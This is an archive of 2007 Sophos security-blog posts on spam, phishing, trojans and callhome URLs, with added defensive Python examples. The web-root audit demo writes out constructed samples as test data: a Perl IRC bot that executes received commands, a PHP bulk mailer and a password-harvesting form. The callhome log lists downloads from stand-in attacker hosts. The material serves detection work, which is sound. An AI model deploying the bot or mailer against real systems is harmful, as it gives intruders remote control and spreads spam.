Sophos

Archive for May, 2007

Hong Kong Phooey

SophosLabs has seen a rise in the number of .HK domains being used for spam, mainly for Viagra and other erectile-dysfunction drugs.

[image: HK_viagra]

  • What is the reason for the rise in spam from Hong Kong?
  • Spammers have evidently got around the registration checks on .HK domains and are acquiring them in bulk.
  • So what needs to happen?
  • The registration checks need to be stronger.

In the UK, when you rent a flat it is normal to pay a deposit (which you get back) of one month's rent upfront, plus the first month's rent. Registering a domain is equivalent to renting it. Perhaps registrars should enforce an equivalent to a deposit and require payment upfront, which would raise the cost of acquiring domains in bulk and burning through them.

What do you think? Email me via sophosblog@sophos.com.


Testing times: Sophos and AV-Test.org

If there’s one job more difficult than being an anti-virus researcher, it’s being the poor guy who has to test anti-virus software!

This has been brought to light today as I looked into a recent test done by the respected independent testers at AV-Test.org, who are based at the University of Magdeburg in Germany.

A few customers have contacted SophosLabs in recent days asking about AV-Test.org's latest set of detection test results. Their report, which examined a wide range of anti-virus products, was published in the German magazine PC Welt and its US counterpart PC World, and has cropped up in numerous places on the web.

We’ve been in touch with Andreas Marx of AV-Test.org who has kindly agreed to run some new tests for us and will be sending us the results shortly. We’ll be sure to update you on the blog as soon as we know more.

Only a couple of weeks ago the anti-virus industry met in Reykjavik to discuss how testing of anti-virus products could be improved and made more meaningful for companies trying to choose a security solution.


Gone are the days of the Passive Packer

Packers have traditionally been used to reduce an executable's footprint by compressing it. They have since evolved to hinder patching and reverse engineering of the underlying application by adding encryption, obfuscation and anti-debugging techniques, but they have never carried payloads of their own.

A new batch of samples recently observed in SophosLabs exhibits the traditional packer features (encryption, compression and obfuscation) and more. This hybrid packer has built-in functionality to modify personal firewall rules so that the host program, once unpacked, can gain unauthorised network access.

This kind of behaviour has traditionally been the preserve of custom-built Trojans and network worms, which leads us to believe the packer itself is intended to be used, and can only sensibly be used, for malicious purposes.

The distinction between wrapper and content has now become as muddied as a winter football field and may justify many security professionals’ paranoia with packed files.
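The practical consequence for triage is that "packed" on its own tells you little, and "touches the firewall" on its own tells you little, but the two together are exactly the hybrid described above. The following is an added example written for this page (not code from SophosLabs or from the post) showing a static triage heuristic: it measures how much of a file looks compressed or encrypted (Shannon entropy per 1 KiB window) and looks for strings that a firewall-tampering stub would carry. The indicator set is an assumption for the example (the Windows XP SP2 firewall exception list registry path, the netsh firewall CLI and the Windows Firewall COM ProgID); the post does not say which mechanism the packer uses, and in a real sample such strings may themselves be encrypted until the stub runs. The sample blobs are constructed, not real malware.

```python
import hashlib
import math
from dataclasses import dataclass, field

# Strings a firewall-tampering stub is likely to carry once unpacked.
# Assumed indicator set for this example; the post does not name the mechanism.
FIREWALL_INDICATORS = (
    b"FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",  # XP SP2 exception list
    b"netsh firewall",                                                  # XP-era firewall CLI
    b"HNetCfg.FwMgr",                                                   # Windows Firewall COM ProgID
)

WINDOW = 1024          # bytes per entropy window
PACKED_ENTROPY = 7.0   # bits per byte; compressed or encrypted data sits near 8


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


@dataclass
class Verdict:
    high_entropy_ratio: float                 # share of windows that look packed/encrypted
    indicators: list = field(default_factory=list)
    suspicious: bool = False


def triage(data: bytes) -> Verdict:
    """Flag a file that is both packed and reaching for the personal firewall.

    Either signal alone is weak: plenty of legitimate software is packed, and
    installers legitimately add firewall exceptions. Together they match the
    hybrid packer described in the post.
    """
    windows = [data[i:i + WINDOW] for i in range(0, len(data), WINDOW)]
    high = sum(1 for w in windows if shannon_entropy(w) > PACKED_ENTROPY)
    ratio = high / len(windows) if windows else 0.0
    found = [ind.decode() for ind in FIREWALL_INDICATORS if ind in data]
    return Verdict(ratio, found, suspicious=ratio > 0.5 and bool(found))


def pseudo_random_bytes(n: int, seed: bytes = b"packer-example") -> bytes:
    """Deterministic stand-in for compressed/encrypted data (SHA-256 chain)."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


# Constructed samples, not real malware: an 8 KiB "packed" body followed by a
# 1 KiB plaintext stub carrying a firewall indicator; the same body with a
# clean stub; and a plain uncompressed text file.
_STUB = FIREWALL_INDICATORS[0] + b"\x00" * (WINDOW - len(FIREWALL_INDICATORS[0]))
PACKED_WITH_FIREWALL_STUB = pseudo_random_bytes(8 * WINDOW) + _STUB
PACKED_ONLY = pseudo_random_bytes(8 * WINDOW) + b"\x00" * WINDOW
PLAIN_TEXT = (b"This program cannot be run in DOS mode.\r\n" * 200)[:4 * WINDOW]

if __name__ == "__main__":
    for name, sample in [("packed+firewall", PACKED_WITH_FIREWALL_STUB),
                         ("packed only", PACKED_ONLY),
                         ("plain text", PLAIN_TEXT)]:
        v = triage(sample)
        print(f"{name:16} entropy ratio={v.high_entropy_ratio:.2f} "
              f"indicators={v.indicators} suspicious={v.suspicious}")
```

The 0.5 ratio and 7.0 bits-per-byte thresholds are tuning knobs, not magic numbers: a file that is mostly high-entropy data with a small plaintext stub is the classic packed layout, and a stub that names the firewall is the part that should not be there. Treat a hit as a reason to unpack and look, not as a verdict.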


World of Wartheft

Online gaming has been the rage since the dawn of the internet. In its infancy it was confined to a few servers and hobbyists; these days it is a multi-million dollar industry. Online gamers are spoilt for choice nowadays, with Blizzard Entertainment's World Of Warcraft still going strong.

It is thus not surprising that SophosLabs analysts continue to see password stealers targeting popular games like World Of Warcraft. Troj/WowPWS-BB is the latest attempt by malware authors to steal information relating to this game and it probably won’t be the last.

The problem with password stealing Trojans like Troj/WowPWS-BB is they don’t announce their presence visibly once they’ve been installed on an infected computer. And usually, the only time victims learn something is amiss is when their World Of Warcraft characters have been depleted of all their online possessions.

By that time, it is often too late.


I Want A Free Key Generator And A Free Bot On My Computer

Password crackers and key generators have long been the bane of commercial software companies because they allow users to circumvent their protection mechanisms without the need to purchase their software.

As a result, it should come as no surprise that some malware authors prey on this particularly vulnerable group of users.

For instance, SophosLabs analysts encountered a Trojan (Troj/Mdrop-BPE) that came bundled with a key generator and a worm with IRC backdoor functionality. When run, the Trojan not only drops the key generator crack for Adobe Photoshop CS3 (Troj/Keygen-BI) but, as an additional freebie, potentially turns your computer into an IRC zombie machine (W32/IRCBot-WA) as well.

[image: Troj/Keygen-BI]

As they say, if something looks too “good” to be true, it usually is.


A Prickly Problem

Another relatively quiet shift on the malware front, but a little more life within the spam feeds. A number of phishing attacks were successfully intercepted today. The usual mixture of targeted brands was present, including Brazilian, American and British banks. Some of the attacks used domains specifically constructed for the job; others used legitimate sites. As noted in a previous post on phishing attacks using compromised sites, digging a little deeper can often reveal some interesting information. Two of the cases probed today are discussed below.

The first interesting phish today targeted Poste Italiane Group (again).

[image: pi-cactus.gif]

Looking at the URL of the phish site, it was clearly a compromised machine. The host site appears to use RRDtool (a logging and graphing application) and Cacti (its graphical front end). Someone appears to have compromised the site and uploaded additional content into one of the directories holding RRD files. Aside from hosting the phishing page, MailMailer (from softSWOT) is present, suggesting that the compromised site is also being used to send spam. A Perl remote shell was also discovered. Once running, this connects to a remote IRC server to await commands. Shells such as this are typically used to scan remote machines and launch exploit or denial of service (DoS) attacks.

One of the other compromised sites used by a phishing attack was uncovered when investigating an attack against Wells Fargo.

[image: wf-mail.gif]

Again, inspecting the URL of the phish site revealed it to be hosted on a compromised site, in this case a reasonably popular news/sport/music portal. Here the hackers seem happy to openly brag about their achievement, leaving their tag within the compromised site (obscenity removed from image):

[image: alban-hack.gif]

These (and many other similar) cases reflect the freedom that intruders have to upload whatever content they wish to a compromised site. Of course, nowadays that content is usually geared towards financial gain (e.g. a phishing attack or the installation of malware).
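Both cases above were found from the outside, by following a phishing URL back to a directory that should never have held HTML. The site owner could have found them first with a baseline of the web root and a check for the kinds of file described in the post. The following is an added example written for this page (not code from SophosLabs or from the post): it hashes every file under a web root, diffs a later snapshot against that baseline, and runs three assumed content heuristics over anything new or changed (a Perl IRC shell, a PHP bulk mailer, a credential-harvesting form). The web root and its "compromise" are constructed in a temporary directory so the example runs offline; the file contents are illustrative, not recovered from the sites in the post.

```python
import hashlib
import tempfile
from pathlib import Path


# Assumed content heuristics modelled on what the post describes finding in a
# compromised web root. They are deliberately crude: the point is that any new
# file in a data directory deserves a look, and these just prioritise it.
def classify(content: bytes) -> list:
    tags = []
    lc = content.lower()
    if lc.startswith(b"#!") and b"perl" in lc[:64] and b"socket" in lc \
            and (b"privmsg" in lc or b"nick " in lc):
        tags.append("perl-irc-shell")        # Perl script that speaks IRC over a socket
    if b"<?php" in lc and b"mail(" in lc and b"$_post" in lc:
        tags.append("php-mailer")            # PHP that sends mail from request input
    if b"<form" in lc and b'type="password"' in lc:
        tags.append("credential-form")       # HTML form asking for a password
    return tags


def build_manifest(root: Path) -> dict:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return manifest


def diff_manifest(baseline: dict, current: dict) -> dict:
    """Files added, removed or changed between two manifests."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def audit(root: Path, baseline: dict) -> dict:
    """Diff the live web root against its baseline and classify anything new or changed."""
    report = diff_manifest(baseline, build_manifest(root))
    findings = {p: classify((root / p).read_bytes()) for p in report["added"] + report["modified"]}
    report["findings"] = {p: tags for p, tags in findings.items() if tags}
    return report


def demo() -> dict:
    """Constructed scenario: a Cacti-style site is baselined, then 'compromised'."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "rra").mkdir()
        (root / "index.php").write_bytes(b"<?php include('include/top_header.php'); ?>")
        (root / "rra" / "traffic.rrd").write_bytes(b"RRD\x00" + b"\x00" * 60)
        baseline = build_manifest(root)

        # Intruder drops a phishing page, a mailer and an IRC shell next to the
        # RRD files and tags the front page. All constructed for the example.
        (root / "rra" / "poste").mkdir()
        (root / "rra" / "poste" / "login.html").write_bytes(
            b'<form method="post" action="post.php">User <input name="u">'
            b'Password <input type="password" name="p"></form>')
        (root / "rra" / "mailer.php").write_bytes(
            b"<?php foreach(explode(\"\\n\",$_POST['to']) as $t){ mail($t,$_POST['s'],$_POST['b']); }")
        (root / "rra" / "bot.pl").write_bytes(
            b"#!/usr/bin/perl\nuse IO::Socket;\n"
            b"my $s=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>6667);\n"
            b"print $s \"NICK pr1ckly\\r\\n\";\n"
            b"while(<$s>){ if(/PRIVMSG .* :!cmd (.*)/){ system($1); } }\n")
        (root / "index.php").write_bytes(b"<h1>tagged</h1>")
        return audit(root, baseline)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The baseline has to be taken from a known-good state and stored off the box (an intruder with upload rights can edit a manifest kept alongside the content), and a modified file with no heuristic hit, like the tagged front page here, still needs a human look: the diff is the finding, the tags only say where to start.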


Calm before the storm?

Things have been eerily quiet on the malware front this weekend. Perhaps the malware authors are taking a time out, shopping for computer parts or something. Or is there some nefarious scheming afoot in order to unleash misery on the innocents at some distinct future date?

Meanwhile, the malware authors’ bosom buddies, the spammers, have obviously decided to defer their “holiday” because the spam has been coming in thick and fast. The spam messages that have been seen are the same old viagra, phishing and stock campaigns with some porn thrown in. Nothing to spa … er … write home about.

In any case, my advice is to keep your eyes peeled. The criminals may need to replenish their post-holiday finances, and we shall all be the target of insidious activity. On the other hand, it may well turn out to be a storm in a teacup.


Infected, compromised? What’s the difference?

Readers will no doubt be familiar with the concept of categorising URLs, and how this forms an important part of security today. Classification enables users to prevent access to URLs that are known to be hosting undesirable content (ranging from phishing sites to malware), or to URLs known to be unsuitable from a policy perspective (for example, gambling sites). A classification type we take very seriously within SophosLabs is that labelled callhome URLs.

So what exactly is a callhome URL? We use this classification for the sites to which malicious files connect in order to download more components or ‘report home’ (and receive remote command). Examples of the latter include typical IRC bots and backdoor and proxy Trojans (for example, Troj/Proxy-HR).

Why is it so important to recognise and block callhome connections? This becomes apparent if you consider the difference between the terms infected and compromised. When a piece of malicious code runs, the machine can be said to be infected. However, as soon as someone has some form of remote access to (and control of) the machine, it is compromised. Infected machines can be cleaned: the malware can be analysed, and the changes it makes upon execution reversed (in most cases). However, once a machine has been compromised, cleaning is not possible. Of course, the malware can be removed, and the changes it is known to have made reversed. But without knowing what changes were made by the intruder with remote access to that machine, it cannot be restored to its original pre-infected state. The victim will rarely know what data has been viewed or tampered with.

So, the business of recognising (and blocking) as many callhome connections as possible is just another piece in the ‘providing protection’ puzzle. Even in cases where the malware itself may be missed, and a machine becomes infected, being able to block the callhome connection can make a huge difference.
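The same infected/compromised distinction is what a proxy log gives you after the fact: a callhome attempt that the proxy denied says the malware ran, while one that completed says someone outside may have had control. The following is an added example written for this page (not code from SophosLabs or from the post) that matches the destination host of each proxy log line against a callhome blocklist, including parent-domain matches, CONNECT tunnels, mixed case and trailing dots, and then sorts clients into "infected" (only blocked attempts seen) and "compromised" (at least one attempt got through). The blocklist, the Squid-style log layout and the log lines are all constructed for the example.

```python
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# Constructed callhome blocklist: a C&C host and a second-stage download host.
# A real feed is much larger and changes continuously.
CALLHOME_BLOCKLIST: Set[str] = {"irc.bot-c2.example", "drop.second-stage.example"}

# Constructed proxy log in an assumed Squid-like "time client status method url" layout.
# TCP_DENIED lines were blocked by the proxy; TCP_MISS/200 lines completed.
SAMPLE_LOG = """\
1180000001.101 10.0.0.5 TCP_MISS/200 GET http://news.example.org/index.html - DIRECT
1180000002.237 10.0.0.5 TCP_MISS/200 GET http://drop.second-stage.example/bin/update.exe - DIRECT
1180000003.412 10.0.0.7 TCP_DENIED/403 CONNECT irc.bot-c2.example:6667 - NONE
1180000004.518 10.0.0.9 TCP_MISS/200 GET http://mail.example.org/ - DIRECT
1180000005.620 10.0.0.7 TCP_DENIED/403 GET http://IRC.BOT-C2.EXAMPLE./cmd?id=7 - NONE
1180000006.001 10.0.0.5 TCP_MISS/200 GET http://cdn.drop.second-stage.example/stage2.bin - DIRECT
"""


def host_matches(host: str, blocklist: Set[str]) -> bool:
    """True if the host itself or any parent domain is on the blocklist."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def host_from_request(method: str, url: str) -> Optional[str]:
    """Destination host of a request; CONNECT carries 'host:port' with no scheme."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0]
    return urlsplit(url).hostname


def find_callhome_attempts(log: str, blocklist: Set[str] = CALLHOME_BLOCKLIST
                           ) -> Dict[str, List[Tuple[str, bool]]]:
    """Map each client IP to (callhome host, completed?) pairs, in log order."""
    hits: Dict[str, List[Tuple[str, bool]]] = {}
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue                       # malformed line: skip rather than guess
        _ts, client, status, method, url = parts[:5]
        host = host_from_request(method, url)
        if host and host_matches(host, blocklist):
            completed = not status.startswith("TCP_DENIED")
            hits.setdefault(client, []).append((host.lower().rstrip("."), completed))
    return hits


def triage_clients(hits: Dict[str, List[Tuple[str, bool]]]) -> Dict[str, str]:
    """Only blocked attempts: infected (clean it). Any completed attempt: compromised (rebuild it)."""
    return {client: ("compromised" if any(done for _, done in events) else "infected")
            for client, events in hits.items()}


if __name__ == "__main__":
    attempts = find_callhome_attempts(SAMPLE_LOG)
    for client, state in triage_clients(attempts).items():
        hosts = sorted({h for h, _ in attempts[client]})
        print(f"{client}: {state} (callhome to {', '.join(hosts)})")
```

Parent-domain matching is what makes a single blocklist entry cover the throwaway subdomains a callhome server tends to sprout, and it is also why the list should hold the most specific domain the intruder controls rather than a shared hosting provider's apex. The "compromised" label is deliberately conservative: one completed connection to a C&C host is enough, because the post's point is that you cannot know what came back over it.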


Sometimes bad things come in small packages…

Researchers at SophosLabs have released detection for Troj/Small-EJA.

As the name implies, Troj/Small-EJA has a very small filesize in comparison to a lot of malware in the wild.

Being small, however, does not mean this malware cannot wreak havoc on a user's computer.

Troj/Small-EJA is designed to download other malware from the internet and execute it without the user's permission.

Weighing in at just over 1 kilobyte in size it is small enough to have downloaded to your computer before you have had the chance to think things through.

Also, if the malware author wished to spam out his creation, which is very common these days, he could do so at a much faster rate, and then let the infected computer do the majority of the downloading.

If successful Troj/Small-EJA will download and run Troj/Rustok-R.

Troj/Rustok-R will create and execute a rootkit designed to hide itself, and potentially any other malware that Troj/Rustok-R may download and execute.

This all goes to show, it's not the size of the file that counts :).


Pirates, Bunnies and Worms

As part of this blog, I plan on providing a weekly summary of what's been happening in SophosLabs.

In many ways it has been a regular week, a large number of the usual variants in malware, spammers up to their usual tricks and a constant stream of new compromised websites.

Last night's "Pirates of the Caribbean" attack shows how organised and opportunistic malware authors are. Timing the spamming out of the Trojan to coincide with the release of the film is hardly inspired, but it does highlight the professional approach the authors are taking.

BadBunny is at the opposite end of the scale, a completely pointless proof of concept that had no real possibility of seriously affecting anyone, whilst Gatina-B highlights how malware is targeted and regional.

In the world of spam, we’ve been seeing quite a lot of abuse of image hosting sites. The technique is similar to the previous abuse of free host sites like Geocities, but in this case, an image is posted and the link included in the spam. Campaigns are stock pump and dump scams along the lines of the ‘normal’ German image spam that became so popular earlier this year. We’ll be going into more detail on this particular technique in the days to come.

With the weekend coming up and public holidays in many countries, it will be interesting to see what happens. The past has shown that it will be either very quiet as the hackers take time out, or busy with many new campaigns. My bet is on the latter, I'm afraid. Either way, we'll have analysts on duty in the labs around the globe to deal with what does (or doesn't) happen.